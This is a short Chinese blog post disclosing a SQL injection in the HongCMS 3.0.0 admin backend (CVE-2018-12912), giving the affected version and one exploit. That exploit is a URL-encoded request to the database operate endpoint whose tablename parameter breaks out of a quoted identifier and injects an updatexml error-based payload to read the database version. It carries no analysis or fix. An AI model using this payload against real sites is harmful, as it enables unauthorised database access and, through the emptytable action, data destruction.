HongCMS 3.0.0 管理后台 SQL 注入

原创 sauren  2018-12-18 13:52  阅读 37 views 次 评论 0 条

一、影响版本

v 3.0.0  地址:https://github.com/Neeke/HongCMS/     目前该CMS已停止维护。CVE : CVE-2018-12912

二、漏洞EXP

/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60

 

本文地址:https://www.sk15.net/archives/107.html
版权声明:本文为原创文章,版权归 sauren 所有,欢迎分享本文,转载请保留出处!
高性能云服务器特惠

发表评论


表情